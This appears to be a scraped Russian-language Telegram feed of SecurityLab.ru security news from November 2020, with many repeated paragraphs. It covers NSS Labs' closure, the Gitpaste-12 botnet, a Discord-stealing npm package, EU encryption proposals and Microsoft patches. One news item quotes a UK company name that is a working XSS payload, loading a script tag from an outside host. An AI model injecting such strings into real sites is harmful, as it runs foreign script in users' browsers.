Генеральный директор компании NSS Labs Джейсон Брвеник (Jason Brvenik), занимающейся тестированием продуктов безопасности, собрал сотрудников на телеконференцию 15 октября и внезапно объявил о закрытии фирмы. Единственным публичным объявлением о закрытии было короткое сообщение на официальном web-сайте «Из-за последствий, связанных с COVID-19, NSS Labs прекратила свою деятельность 15 октября».
https://www.securitylab.ru/news/513842.php
https://www.securitylab.ru/news/513842.php
t.me
Внезапное закрытие NSS Labs оставило много вопросов без ответов
Бывшие руководители и сотрудники делятся некоторыми мыслями о закрытии компании.
В прошлом некоторые организации ради шутки в качестве названия использовали строки кода, но как минимум одной из них пришлось его поменять. Как сообщает The Guardian, Регистрационная палата Великобритании вынудила одну из консалтинговых компаний изменить свое название после того, как стало известно, что с его помощью можно осуществлять XSS-атаки на уязвимые страницы, в том числе самой Регистрационной палаты. Как оказалось, лишь упомянув название компании, сайт регулятора мог неумышленно сам себя скомпрометировать. Не очень удобная ситуация для госоргана, изначально одобрившего проблемное название.
Речь идет о названии “><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD”, опасном для сайтов, не способных обрабатывать HTML-форматирование должным образом. Такие сайты могут решить, что поле с названием компании пустое, и запустить скрипт с сайта XSS Hunter. Данный скрипт вполне безобиден и просто отображает предупреждение, но Регистрационной палате этого показалось вполне достаточно для того, чтобы обязать компанию сменить название. Теперь она называется “THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD” (“ТА САМАЯ КОМПАНИЯ, НАЗВАНИЕ КОТОРОЙ РАНЬШЕ СОДЕРЖАЛО СКРИПТОВЫЕ ТЕГИ HTML LTD”). По словам представителей Регистрационной палаты, ими были предприняты меры по предотвращению возникновения подобных ситуаций в будущем.
https://www.securitylab.ru/news/513846.php
Речь идет о названии “><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD”, опасном для сайтов, не способных обрабатывать HTML-форматирование должным образом. Такие сайты могут решить, что поле с названием компании пустое, и запустить скрипт с сайта XSS Hunter. Данный скрипт вполне безобиден и просто отображает предупреждение, но Регистрационной палате этого показалось вполне достаточно для того, чтобы обязать компанию сменить название. Теперь она называется “THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD” (“ТА САМАЯ КОМПАНИЯ, НАЗВАНИЕ КОТОРОЙ РАНЬШЕ СОДЕРЖАЛО СКРИПТОВЫЕ ТЕГИ HTML LTD”). По словам представителей Регистрационной палаты, ими были предприняты меры по предотвращению возникновения подобных ситуаций в будущем.
https://www.securitylab.ru/news/513846.php
SecurityLab.ru
Компанию вынудили сменить название, способное спровоцировать XSS-атаку
Название “><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD” оказалось опасным для сайтов, не способных должным образом обрабатывать HTML.
Forwarded from Анонсы лучших ИБ мероприятий
Присоединяйтесь к онлайн-конференции Trend Micro CLOUDSEC 2020
В этом году конференция CLOUDSEC Trend Micro впервые пройдет в режиме онлайн, в том числе в странах Ближнего Востока и Африки. Мы хотим сделать это мероприятие максимально полезным, и нам важно узнать ваше мнение. CLOUDSEC 2020 Virtual проходит под девизом Transformation Your Way («Ваш путь к трансформации»), и поэтому мы приглашаем вас внести свой вклад в подготовку конференции и рассказать, какой ее хотите видеть вы.
Смотрите анонс CLOUDSEC 2020. Узнайте, что вас ждет на ведущей конференции по облачным технологиям и кибербезопасности.
В этом году конференция CLOUDSEC Trend Micro впервые пройдет в режиме онлайн, в том числе в странах Ближнего Востока и Африки. Мы хотим сделать это мероприятие максимально полезным, и нам важно узнать ваше мнение. CLOUDSEC 2020 Virtual проходит под девизом Transformation Your Way («Ваш путь к трансформации»), и поэтому мы приглашаем вас внести свой вклад в подготовку конференции и рассказать, какой ее хотите видеть вы.
Смотрите анонс CLOUDSEC 2020. Узнайте, что вас ждет на ведущей конференции по облачным технологиям и кибербезопасности.
Исследователи безопасности из Juniper Threat Labs обнаружили новый ботнет, получивший название Gitpaste-12. Вредонос использует платформы GitHub и Pastebin для размещения кода компонентов и использует 12 разных способов для компрометации систем.
Эксперты зафиксировали первые атаки Gitpaste-12 15 октября 2020 года, однако на платформе GitHub сам вредонос был обнаружен еще 9 июля. Операторы Gitpaste-12 в основном атакуют серверы x86 на базе Linux и IoT-устройства на базе процессоров Linux ARM и MIPS.
На первом этапе атаки Gitpaste-12 пытается использовать известные эксплоиты для взлома систем и может попытаться осуществить брутфорс-атаку. После взлома вредоносная программа загружает скрипт из Pastebin, который повторно запускается каждую минуту. Как предполагают эксперты, таким образом и обновляется ботнет.
Основной скрипт оболочки, загруженный на устройство жертвы во время атаки, начинает загружать и выполнять компоненты с GitHub. После этого вредоносная программа подготавливает целевую среду, устраняя системные средства защиты, такие как правила межсетевого экрана и стандартное программное обеспечение для предотвращения и мониторинга киберугроз. Исследователи обнаружили скрипт, содержащий комментарии на китайском языке и команды для отключения некоторых инструментов безопасности. В одном из случаев команды отключали агенты облачной безопасности, указывая на намерения киберпреступников атаковать инфраструктуру общедоступного облака, предоставляемую Alibaba Cloud и Tencent.
https://www.securitylab.ru/news/513852.php
Эксперты зафиксировали первые атаки Gitpaste-12 15 октября 2020 года, однако на платформе GitHub сам вредонос был обнаружен еще 9 июля. Операторы Gitpaste-12 в основном атакуют серверы x86 на базе Linux и IoT-устройства на базе процессоров Linux ARM и MIPS.
На первом этапе атаки Gitpaste-12 пытается использовать известные эксплоиты для взлома систем и может попытаться осуществить брутфорс-атаку. После взлома вредоносная программа загружает скрипт из Pastebin, который повторно запускается каждую минуту. Как предполагают эксперты, таким образом и обновляется ботнет.
Основной скрипт оболочки, загруженный на устройство жертвы во время атаки, начинает загружать и выполнять компоненты с GitHub. После этого вредоносная программа подготавливает целевую среду, устраняя системные средства защиты, такие как правила межсетевого экрана и стандартное программное обеспечение для предотвращения и мониторинга киберугроз. Исследователи обнаружили скрипт, содержащий комментарии на китайском языке и команды для отключения некоторых инструментов безопасности. В одном из случаев команды отключали агенты облачной безопасности, указывая на намерения киберпреступников атаковать инфраструктуру общедоступного облака, предоставляемую Alibaba Cloud и Tencent.
https://www.securitylab.ru/news/513852.php
SecurityLab.ru
Новый ботнет Gitpaste-12 эксплуатирует 11 уязвимостей для компрометации систем
Операторы Gitpaste-12 размещают компоненты вредоноса на платформах GitHub и Pastebin.
В Телеграме есть только один канал, который делает обзоры на работающие на спецслужбы хакерские группы (APT), разбирает их атаки и шпионские трояны.
А еще изучает активность ransomware, постит инфосек юмор и, естественно, не забывает про новости из отрасли информационной безопасности.
Это канал SecAtor.
На канале можно найти обзоры на американскую APT Equation, северокорейскую Lazarus, вьетнамскую Ocean Lotus, индийскую Patchwork, тайваньскую PoisonVine и многие другие.
Подписывайтесь на канал SecAtor и вы узнаете это и многое другое!
А еще изучает активность ransomware, постит инфосек юмор и, естественно, не забывает про новости из отрасли информационной безопасности.
Это канал SecAtor.
На канале можно найти обзоры на американскую APT Equation, северокорейскую Lazarus, вьетнамскую Ocean Lotus, индийскую Patchwork, тайваньскую PoisonVine и многие другие.
Подписывайтесь на канал SecAtor и вы узнаете это и многое другое!
Telegram
SecAtor
Руки-ножницы российского инфосека.
Для связи - mschniperson@mailfence.com
Для связи - mschniperson@mailfence.com
SecurityLab.ru pinned «В Телеграме есть только один канал, который делает обзоры на работающие на спецслужбы хакерские группы (APT), разбирает их атаки и шпионские трояны. А еще изучает активность ransomware, постит инфосек юмор и, естественно, не забывает про новости из отрасли…»
В Совете министров ЕС приняли решение обязать операторов таких платформ, как WhatsApp, Signal и прочие, создавать мастер-ключи для мониторинга чатов и сообщений со сквозным шифрованием. Поводом для данной резолюции стала террористическая атака в Вене.
Решение уже прошло необходимые стадии согласования и может быть принято на видеоконференции министров внутренних дел и юстиции ЕС в начале декабря нынешнего года. Кроме того, Вену намерен посетить президент Совета ЕС Шарль Мишель с целью провести переговоры с федеральным канцлером Австрии Себастьяном Курцем.
19 ноября решение одобрят в рабочей группе Совета по сотрудничеству в сфере национальной безопасности, а 25 ноября планируется внести в Совет постоянных представителей государств-членов ЕС. После принятия проекта последует приказ Совета министров Комиссии ЕС о разработке постановления.
https://www.securitylab.ru/news/513862.php
Решение уже прошло необходимые стадии согласования и может быть принято на видеоконференции министров внутренних дел и юстиции ЕС в начале декабря нынешнего года. Кроме того, Вену намерен посетить президент Совета ЕС Шарль Мишель с целью провести переговоры с федеральным канцлером Австрии Себастьяном Курцем.
19 ноября решение одобрят в рабочей группе Совета по сотрудничеству в сфере национальной безопасности, а 25 ноября планируется внести в Совет постоянных представителей государств-членов ЕС. После принятия проекта последует приказ Совета министров Комиссии ЕС о разработке постановления.
https://www.securitylab.ru/news/513862.php
SecurityLab.ru
Евросоюз намерен ввести запрет на сквозное шифрование
Поводом для рассмотрения документа послужила террористическая атака в Вене.
В ходе практических занятий Bug Bounty киберспециалисты будут изучать методы оценки безопасности компьютерных систем объектов критической инфраструктуры Украины, сообщает пресс-служба СНБО Украины.
9 ноября в Киеве начались учения Bug Bounty, организованные Национальным координационным центром кибербезопасности при Совете нацбезопасности и обороны Украины при поддержке Фонда гражданских исследований и развития США (CRDF Global). Об этом сообщает пресс-служба СНБО Украины.
"Представители основных субъектов обеспечения кибербезопасности Украины и работники критической инфраструктуры в течение пяти дней будут получать навыки проведения пентестаобъектов критической инфраструктуры, создания комплексной системы защиты таких объектов и усиления собственных технических возможностей", – говорится в сообщении.
https://www.securitylab.ru/news/513865.php
9 ноября в Киеве начались учения Bug Bounty, организованные Национальным координационным центром кибербезопасности при Совете нацбезопасности и обороны Украины при поддержке Фонда гражданских исследований и развития США (CRDF Global). Об этом сообщает пресс-служба СНБО Украины.
"Представители основных субъектов обеспечения кибербезопасности Украины и работники критической инфраструктуры в течение пяти дней будут получать навыки проведения пентестаобъектов критической инфраструктуры, создания комплексной системы защиты таких объектов и усиления собственных технических возможностей", – говорится в сообщении.
https://www.securitylab.ru/news/513865.php
t.me
Фонд гражданских исследований и развития США поможет Украине бороться с хакерами
Представители основных субъектов обеспечения кибербезопасности Украины и работники критической инфраструктуры в течение пяти дней будут получать навыки проведения пентеста.
Европейское агентство сетевой и информационной безопасности (European Union Agency for Cybersecurity, ENISA) представило руководство по обеспечению безопасности цепочки поставок для «Интернета вещей» (Internet of Things, IoT).
https://www.securitylab.ru/news/513871.php
https://www.securitylab.ru/news/513871.php
t.me
ENISA представило руководство по безопасности цепочки поставок для IoT
Руководство анализирует различные этапы процесса разработки и определяет методы, которые необходимо учитывать на каждом этапе.
Исследователи компании Sonatype обнаружили пакет npm (библиотеку JavaScript), содержащий вредоносный код, предназначенный для похищения конфиденциальных файлов из браузера пользователя и приложения Discord.
https://www.securitylab.ru/news/513879.php
https://www.securitylab.ru/news/513879.php
t.me
Вредоносный пакет npm похищает переписку в Discord
На портале npm обнаружена вредоносная JavaScript-библиотека discord.dll.
Федеральная торговая комиссия США (FTC) объявила о компромиссном соглашении с Zoom после того, как изначально обвинила компанию «в серии обманчивых и недобросовестных действий, подрывающих безопасность пользователей», в частности в утверждении, что используемое ею шифрование надежнее, чем было на самом деле.
https://www.securitylab.ru/news/513882.php
https://www.securitylab.ru/news/513882.php
t.me
FTC обвинила Zoom в ведении пользователей в заблуждение по поводу мер безопасности
По словам представителей Zoom, компания уже решила выявленные FTC проблемы.
Forwarded from Анонсы лучших ИБ мероприятий
Атакующая сторона в кибербезопасности — какая она?
Сделайте свой первый шаг на атакующую сторону — записывайтесь на интенсив по ссылке прямо сейчас
На интенсиве «Pentesting: Level 0» вы познакомитесь с типичными задачами Red Team, на практике разберетесь в типовых уязвимостях и, как происходит их эксплуатация. А также, проведете взлом приложения, доступного в сети, при помощи эксплойта из набора в фреймворке Metasploit и много другое!
3 дня интенсива «Pentesting: Level 0» — это:
— Первый модуль профессиональной программы
— Практические занятия в формате CTF
— Живое общение с участниками и экспертами
— Оценка своих сил и карьерных перспектив в мире ИБ
Эксперт интенсива — Егор Богомолов, в кейсе которого 200+ проектов анализа защищенности, BugBounty Yandex и HackerOne, а также ряд сертификаций, включая OSCP
Только на этой неделе стоимость участия 2300 рублей. Осталось 20 мест!
Сделайте свой первый шаг на атакующую сторону — записывайтесь на интенсив по ссылке прямо сейчас: https://is.gd/mIFRv2
Сделайте свой первый шаг на атакующую сторону — записывайтесь на интенсив по ссылке прямо сейчас
На интенсиве «Pentesting: Level 0» вы познакомитесь с типичными задачами Red Team, на практике разберетесь в типовых уязвимостях и, как происходит их эксплуатация. А также, проведете взлом приложения, доступного в сети, при помощи эксплойта из набора в фреймворке Metasploit и много другое!
3 дня интенсива «Pentesting: Level 0» — это:
— Первый модуль профессиональной программы
— Практические занятия в формате CTF
— Живое общение с участниками и экспертами
— Оценка своих сил и карьерных перспектив в мире ИБ
Эксперт интенсива — Егор Богомолов, в кейсе которого 200+ проектов анализа защищенности, BugBounty Yandex и HackerOne, а также ряд сертификаций, включая OSCP
Только на этой неделе стоимость участия 2300 рублей. Осталось 20 мест!
Сделайте свой первый шаг на атакующую сторону — записывайтесь на интенсив по ссылке прямо сейчас: https://is.gd/mIFRv2
SecurityLab.ru pinned «Атакующая сторона в кибербезопасности — какая она? Сделайте свой первый шаг на атакующую сторону — записывайтесь на интенсив по ссылке прямо сейчас На интенсиве «Pentesting: Level 0» вы познакомитесь с типичными задачами Red Team, на практике разберетесь…»
Министерство внутренних дел за этот год разместило 44 госзакупки на поставки средств, которые предназначены для получения доступа к информации смартфонов. Полиция собирается приобрести системы иностранного производства. В среднем один АПК стоит около 1,5 млн рублей, а покупать их приходится за рубежом.
https://www.securitylab.ru/news/513885.php
https://www.securitylab.ru/news/513885.php
t.me
С начала 2020 года МВД России потратило 80 млн рублей на средства взлома смартфонов
Больше всего (59,1 млн рублей) уходит на аппаратно-программные комплексы (АПК).
Forwarded from Анонсы лучших ИБ мероприятий
Вебинар «PenTera: непрерывный комплексный пентест инфраструктуры»
«Инфосистемы Джет» приглашает вас на продуктовый вебинар «PenTera: непрерывный комплексный пентест инфраструктуры», 12 ноября в 16.00. Это заключительное онлайн-мероприятие из цикла вебинаров про автопентесты «Новый взгляд на анализ защищенности: фокус на real security». На вебинаре вы сможете познакомиться с платформой Pcysys PenTera, узнать о её преимуществах перед другими методами анализа защищённости и увидеть систему в действии. Платформа автоматизации пентеста автоматически находит и выполняет этичную эксплуатацию уязвимостей, строит и визуализирует полные векторы атак, даёт рекомендации по устранению выявленных недостатков для повышения защиты.
Вебинар будет полезен руководителям служб информационной безопасности и ИБ-специалистам, которые задумываются о повышении реальной защищенности, и специалистам по тестированию на проникновение, которые смогут узнать, как использовать автопентесты для минимизации рутинных задач.
«Инфосистемы Джет» приглашает вас на продуктовый вебинар «PenTera: непрерывный комплексный пентест инфраструктуры», 12 ноября в 16.00. Это заключительное онлайн-мероприятие из цикла вебинаров про автопентесты «Новый взгляд на анализ защищенности: фокус на real security». На вебинаре вы сможете познакомиться с платформой Pcysys PenTera, узнать о её преимуществах перед другими методами анализа защищённости и увидеть систему в действии. Платформа автоматизации пентеста автоматически находит и выполняет этичную эксплуатацию уязвимостей, строит и визуализирует полные векторы атак, даёт рекомендации по устранению выявленных недостатков для повышения защиты.
Вебинар будет полезен руководителям служб информационной безопасности и ИБ-специалистам, которые задумываются о повышении реальной защищенности, и специалистам по тестированию на проникновение, которые смогут узнать, как использовать автопентесты для минимизации рутинных задач.
SecurityLab.ru pinned «Вебинар «PenTera: непрерывный комплексный пентест инфраструктуры» «Инфосистемы Джет» приглашает вас на продуктовый вебинар «PenTera: непрерывный комплексный пентест инфраструктуры», 12 ноября в 16.00. Это заключительное онлайн-мероприятие из цикла вебинаров…»
Во вторник, 10 ноября, компания Microsoft выпустила плановые ежемесячные обновления безопасности в своих продуктах. Обновления исправляют 112 уязвимостей в различных продуктах, начиная от Microsoft Edge и закачивая Windows WalletService. 24 уязвимости являются критическими, поскольку позволяют злоумышленникам удаленно выполнить код на системе жертвы.
https://www.securitylab.ru/news/513954.php
https://www.securitylab.ru/news/513954.php
t.me
Ноябрьские обновления безопасности Microsoft исправляют 0-day в Windows
Уязвимость существует в ядре Windows и затрагивает все поддерживаемые версии ОС.
Власти Европейского союза ужесточили нормы, регулирующие продажу и экспорт технологий для киберслежения. Европейские законодательные органы и Европейский совет достигли предварительной договоренности об обновлении норм, контролирующих оборот товаров двойного назначения, таких как технологии распознавания лиц и шпионское ПО, чтобы предотвратить их использование с целью нарушения прав человека.
https://www.securitylab.ru/news/513964.php
https://www.securitylab.ru/news/513964.php
t.me
Евросоюз ужесточил правила экспорта технологий слежения
ЕС обязал компании доказывать, что экспортируемые ими технологии не будут использоваться для нарушения прав человека.
Злоумышленники похитили доступ к одному из крупных русскоязычных Telegram-каналов, посвященному интернет-ресурсу Reddit. Редакция «Кода Дурова» узнала у администратора канала подробности инцидента.
https://www.securitylab.ru/news/513992.php
https://www.securitylab.ru/news/513992.php
t.me
Мошенники похитили доступ к посвященному Reddit русскоязычному Telegram-каналу
Преступникам удалось обойти двухфакторную авторизацию и системы защиты Telegram.